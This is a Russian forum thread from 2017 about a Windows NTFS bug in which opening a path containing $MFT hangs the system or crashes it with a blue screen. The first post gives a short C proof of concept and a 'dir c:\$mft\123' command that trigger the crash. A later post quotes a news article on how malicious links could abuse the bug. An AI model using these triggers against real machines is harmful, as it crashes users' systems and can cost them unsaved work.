22.05.2017 14:34
OlegON
 
Достаточно открыть файл и система вешается, либо уходит в синьку
Код:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main() {
	CreateFileW( L"C:\\$mft\\123", FILE_READ_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL );
	return 0;
}
может не работать на XP и 10 с последними обновлениями.
Все остальные могут выполнить (после того, как приготовятся потом нажать Reset на системнике)
Код:
dir c:\$mft\123
эта команда тупо вешает систему. Как вариант - просто открыть Проводник и в адрес вбить c:\$mft\123\
27.05.2017 21:15
vvm
 
Более подробно

Зловредная ссылка, которую потенциально можно разместить на веб-сайте или в электронном письме, эксплуатирует данную уязвимость и может замедлить или вовсе остановить работу системы. Суть сбоя заключается в том, что сайт предлагает загрузить на устройство изображение с названием $MFT в пути к директории — это имя используется в файловой системе NTFS для специального файла метаданных. Он существует в корневой папке, но скрыт от пользователя.


В результате Windows 7, 8, а также Vista испытывают трудности с распознаванием имени заданной папки. Система замедляется до такого состояния, что компьютер приходится перезагружать, чтобы продолжить работу в нормальном режиме.

Иногда ОС выдает даже «синий экран смерти».

Как отмечает International Business Times, похожий баг существовал еще в 90-х годах и был нацелен на Windows 95 и 98. Специалист по информационной безопасности ТСС Илья Шарапов рассказал «Газете.Ru», что уязвимым местом этих операционных систем были файлы со специальными именами, которые связаны с аппаратными устройствами. К таким файлам можно было обратиться, если они не существовали в системе. В 90-х таким специальным именем было «con», которое отвечало за устройства ввода/вывода.

«В случае двойного обращения к «con/con/» работа системы завершалась с ошибкой. Ссылка с опасным адресом могла прийти по электронной почте или встретиться в интернете», — пояснил эксперт.

Найденная уязвимость не затрагивает пользователей Windows 10, так как в ней используются другие специальные имена, но всем остальным стоит иметь этот баг в виду. Компания Microsoft была уведомлена об этой ситуации, но пока не дала комментарий по поводу выпуска патча, устраняющего проблему. Стоит отметить, что уязвимость распространяется и на Windows Vista, которая уже не поддерживается Microsoft и не получает обновлений.

Технический директор компании Check Point Software Technologies Никита Дуров объяснил корреспонденту, что этот баг нельзя назвать уязвимостью в информационной безопасности, так как он представляет собой техническую проблему в работе файловой системы NTFS.
28.05.2017 08:54
OlegON
 
Т.е. то, что систему можно вывести из строя, уже не уязвимость? Ну-ну...
Часовой пояс GMT +3, время: 03:27.

Форум на базе vBulletin®
Copyright © Jelsoft Enterprises Ltd.
В случае заимствования информации гипертекстовая индексируемая ссылка на Форум обязательна.